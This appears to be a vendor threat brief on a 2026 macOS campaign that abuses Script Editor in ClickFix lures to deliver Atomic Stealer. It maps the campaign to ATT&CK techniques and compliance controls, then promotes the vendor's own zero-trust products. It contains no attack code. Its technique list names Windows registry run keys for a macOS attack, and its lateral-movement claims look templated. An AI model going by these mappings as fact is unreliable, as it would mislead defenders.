Executive Summary
In April 2026, a new macOS malware campaign emerged, leveraging the Script Editor application to deliver the Atomic Stealer (AMOS) malware. Attackers employed a variation of the ClickFix technique, directing users to malicious websites that prompted them to open Script Editor via the 'applescript://' URL scheme. This method executed obfuscated commands to download and run AMOS, which exfiltrated sensitive data including Keychain information, browser credentials, and cryptocurrency wallets. This incident underscores the evolving tactics of threat actors targeting macOS systems, particularly through trusted applications like Script Editor. The shift from Terminal-based to Script Editor-based ClickFix attacks highlights the need for continuous vigilance and user education to recognize and avoid such sophisticated social engineering schemes.
Why This Matters Now
The adaptation of ClickFix attacks to utilize macOS's Script Editor indicates a significant evolution in malware delivery methods, bypassing traditional security measures and exploiting user trust in built-in applications. This trend necessitates heightened awareness and updated defensive strategies to protect sensitive data on macOS systems.
Attack Path Analysis
The attack began with users visiting compromised websites that prompted them to open the macOS Script Editor via the 'applescript://' URL scheme, leading to the execution of malicious scripts. Upon execution, the script downloaded and ran the Atomic Stealer malware, granting the attacker unauthorized access to the system. The malware then moved laterally within the system, accessing various directories and applications to harvest sensitive data. It established a command and control channel to transmit the exfiltrated data back to the attacker's server. The exfiltrated data included Keychain passwords, browser cookies, and cryptocurrency wallet information. The impact of the attack was the unauthorized disclosure of sensitive personal and financial information, leading to potential identity theft and financial loss.
Kill Chain Progression
Initial Compromise
Description
Users were tricked into opening the macOS Script Editor via malicious websites using the 'applescript://' URL scheme, leading to the execution of malicious scripts.
MITRE ATT&CK® Techniques
Command and Scripting Interpreter: AppleScript
User Execution: Malicious Link
Ingress Tool Transfer
Input Capture: GUI Input Capture
Masquerading: Match Legitimate Name or Location
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Archive Collected Data
Exfiltration Over C2 Channel
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
NIST SP 800-53 – Malicious Code Protection
Control ID: SI-3
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – User Training and Awareness
Control ID: Identity Pillar
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Atomic Stealer's Script Editor abuse targets developer environments with cryptocurrency wallets, browser credentials, and Keychain data through ClickFix social engineering attacks.
Financial Services
InfoStealer malware specifically targets cryptocurrency wallets, browser-stored financial credentials, and payment data, compromising client financial information and regulatory compliance requirements.
Information Technology/IT
MacOS-focused campaign exploits trusted Script Editor application to bypass security controls, requiring enhanced egress filtering and anomaly detection for IT infrastructure protection.
Computer/Network Security
ClickFix attacks demonstrate sophisticated social engineering bypassing macOS protections, necessitating updated threat detection capabilities and zero-trust segmentation for security operations.
Sources
- New macOS stealer campaign uses Script Editor in ClickFix attackhttps://www.bleepingcomputer.com/news/security/new-macos-stealer-campaign-uses-script-editor-in-clickfix-attack/Verified
- Script Editor new entry point for ClickFix malware on Machttps://appleinsider.com/articles/26/04/08/mac-script-editor-becomes-new-entry-point-for-clickfix-malwareVerified
- Infostealers without borders: macOS, Python stealers, and platform abusehttps://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and exfiltrate sensitive data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF may have limited the execution of unauthorized scripts by enforcing strict identity-based policies, thereby reducing the risk of initial compromise.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation could have constrained the malware's ability to escalate privileges by enforcing least-privilege access controls, thereby reducing the attacker's operational scope.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security may have restricted the malware's lateral movement by monitoring and controlling internal traffic, thereby reducing the attacker's ability to access additional resources.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could have detected and constrained unauthorized outbound communications, thereby reducing the effectiveness of the command and control channel.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement may have limited the exfiltration of sensitive data by enforcing strict outbound traffic policies, thereby reducing the risk of data loss.
The implementation of Aviatrix Zero Trust CNSF controls could have reduced the scope of data exposure, thereby limiting the potential impact on affected individuals.
Impact at a Glance
Affected Business Functions
- User Data Security
- System Integrity
- Application Security
Estimated downtime: N/A
Estimated loss: N/A
Potential exposure of sensitive user data including Keychain information, browser credentials, and cryptocurrency wallet details.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict unauthorized access and limit lateral movement within the system.
- • Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- • Utilize Threat Detection & Anomaly Response to identify and respond to malicious activities promptly.
- • Deploy Inline IPS (Suricata) to detect and prevent the execution of known malicious scripts and payloads.
- • Educate users on recognizing and avoiding social engineering tactics, such as malicious websites prompting script execution.
